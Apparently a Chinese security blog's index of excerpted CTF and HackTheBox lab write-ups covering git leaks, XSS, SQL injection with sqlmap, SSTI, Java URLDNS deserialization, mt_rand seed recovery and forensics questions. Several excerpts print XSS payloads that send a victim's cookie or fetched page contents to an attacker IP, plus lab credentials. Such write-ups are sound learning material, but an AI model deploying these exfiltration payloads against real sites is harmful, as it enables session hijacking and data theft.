HTB-Administrator
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
1234567891011121314151617181920212223242526272829303132333435363738┌──────────────────────────────────────────────┐│ ___ _ ││ / _ \ ___ ___ _ __ __ _ ___| | __ ││ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / ││ / /_\\_____\__ \ (__| | | (_| | (__| < ││ \____/ |___ ...
HTB-LinkVortex
fscan扫描没什么内容 目录扫描扫到
1http://linkvortex.htb/robots.txt
123456User-agent: *Sitemap: http://linkvortex.htb/sitemap.xmlDisallow: /ghost/Disallow: /p/Disallow: /email/Disallow: /r/
一个登录框,但是暂时利用不起来
fuzz出一个[Launching Soon](http://dev.linkvortex.htb/)
git泄露
githack和githacker拉下来不大一样
可以获取到一些敏感信息泄露
12const email = 'test@example.com';const password = 'OctopiFociPilfer45';
学到了一个新姿势
可以关注/.git/logs/HEAD是对应的上传者的相关信息
10000000000000000000000000000000000000000 299cdb4387763 ...
HTB-Cat
fscan
dirsearch扫到git泄露
githacker拉下来
注册账号后发现这里可能有漏洞点
审计代码 这里对出了照片的其他选项做了过滤,因此可以从照片入手
貌似是对MIME头做了检验
下面还有一个白名单
那好像不大好注了
看看别的
在view_cat看到打印了这么多内容
其中这几个在前面看到是被waf过滤过的
那么就可以从用户名入手
1<img src=1 onerror=this.src="http://10.10.16.35:4444/?yiyi="+encodeURIComponent(document.cookie)>
注册登录后注册一只猫
得到审核人员的cookie
替换cookie进入管理员面板
继续审计accept_cat部分的代码,发现没有太多防护措施 且通过config可以看出是sqlite
尝试sqlmap注入一下
12python sqlmap.py -r C:\Users\31702\Desktop\tmp\req.txt --dbms=SQLite --tables --batch --l ...
HTB-Alert
dirsearch
打开网站 是一个文件上传
只能传markdown文件
尝试xss
尝试访问/messages.php文件并将响应结果传输回攻击机
12345<script>fetch("http://alert.htb/messages.php").then(response => response.text()).then(data => {fetch("http://10.172.29.1:4444/?file_content=" + encodeURIComponent(data));});</script>
通过sharemarkdown获得路径
1http://alert.htb/visualizer.php?link_share=67da848835c9b5.19283533.md
发送给网站管理员
bot点击后弹回内容
url解密得到
1<h1>Messages</h1><ul><li>< ...
XCTF-TPCTF
TPCTF-XCTF rk6
没爆0 输出了一点
supersqli看到这类的waf有点走不动道
第一反应是绕过waf,这里尝试了两种思路
一开始想到是http走私,但是没走成,前后都处理了TE头
https://www.geekby.site/2022/03/waf-bypass/#multipart-%E6%B7%B7%E6%B7%86
想着可以通过这种方式,waf那里把password当成文件,而后端又把password覆盖了
对着这篇文章改了一下,UNION SELECT递归拼接sql语句自身,replace绕过字符限制
123456789101112131415161718192021222324POST /flag/ HTTP/1.1Host: 1.95.159.113Content-Length: 523Cache-Control: max-age=0Origin: http://1.95.159.113Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x6 ...
Java反序列化之URLDNS链分析
123ctfshow会对你post提交的ctfshow参数进行base64解码然后进行反序列化构造出对当前题目地址的dns查询即可获得flag
链子
HashMap->readObject()
HashMap->hash()
URL->hashCode()
URLStreamHandler->hashCode()
URLStreamHandler->getHostAddress()
InetAddress->getByName()
入口类选择12345实现Serializable接口;重写readObject方法,调用一个常见的函数;接收参数类型宽泛;最好JDK自带;
本链入口类为**java.util.HashMap**
首先hashmap实现了Serializable接口
因为**HashMap<K,V>存储数据采用的哈希表结构,元素的存取顺序不能保证一致。由于要保证键的唯一、不重复,在反序列化过程中就需要对Key进行hash,这样一来就需要重写readObject**方法。
调用了**hash函数,根据key产生hash。 ...
2025VNCTF
WEBez_emlog
猴子大王在1月23日开始学习Web安全并搭建了一个博客,你能找到他博客的漏洞吗。
一条人一只烟 一道web干一天
也是给我挖上0day了
拉源码做审计
跟一下,使用mt_rand生成随机数
由于这两个都调用了getRandStr函数,分别查看调用
account.php的logout接口设置了cookie,可以访问看一下
果然返回了,那么就可以逆序getRandStr进行解密后补零进行seed爆破
mt_rand()函数的特性-MT19937
MT19937有624个内部状态
每个状态是32位整数
需要624个连续的输出才能完全确定内部状态
我们需要补32组0 0 0 0提供足够的状态信息
12345678910111213<?php$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';$chars_length = strlen($chars) - 1;$p = 'RbAWvNJZ5YMeZLGMr56lfj ...
2025西湖论剑
签到
webRank-l
【Flag完整格式一般为:DASCTF{******},只需要提交{}内的内容。若Flag为其它格式,则会在题目描述中单独说明。】
49测试得到HTML_Entity编码的回显,ssti特征
测试得到子类
1234567891011121314151617181920212223{{''.__class__.__bases__[0]}}<class 'object'>{{''.__class__.__bases__[0].__subclasses__}}<built-in method __subclasses__ of type object at 0x7ff042cb17e0>{{''.__class__.__bases__[0].__subclasses__()}}[<class 'type'>, ...
2024数证杯决赛团队赛
团队赛MD5值:E5297609ACCD1C8DF7E6F56F8912E734
团队赛容器密码:mW7@B!tRpXz46Y9#KFUV^J2&NqoHqTpLCE%8rvGW(AX#1k@YL3$M5!bWY9HLFq7UZR6^T!XoVmPK28J&CY9%6(Arz#tbU4oXYKLp7Wq^FV9H
计算机取证计算机取证-120题目描述
计算机中曾挂载的bitlocker加密的分区的驱动器号为?(答案格式:大写字母,如C) (2.0分)
1V
计算机取证-220题目描述
分析计算机和内存检材,计算机中的Bitlocker加密分区的恢复密钥后6位为?(答案格式:123456) (4.0分)
1432267
得到
1469876-653598-354629-023573-566423-569162-055055-432267
计算机取证-320题目描述
计算机中通过向日葵接收的最后一个文件名称为?(答案格式:需带后缀名,如Abc.doc) (4.0分)
计算机取证-420题目描述
计算机中加密容器8df84968a5b8c4d072c4 ...
2024CISCN&铁三初赛web
80b01bd5e3ed21c18e97cc6f6c56421b31f4b669eaa54b8d5cd1164969fc442ee6ddb452c2a8d1a98b9125f4d3a3149a10a041f24ba32cf5a5b0dc2c2c82bfd6b15dac493a28e9d4c39a4d2d318398e2b0075a4338d42ded58193153a057a8f1d5979d27c04cf63089ff567bac14fa86ff642446479e9012a3850e111b8b9c2c26548d62ff5c58f7547e65f969f8e11425d347df620745216dbda157c9a55867c93d3b05203bb8ce30a053792a741501d57b1cc435e86e862983449744e7c98e06cba691ca1a91c2582440d2381c2d9ba122b330c999904596c1a4ba3a1114163bf4d972418bace5a55568ac7d96e781eedd1e37349f18827 ...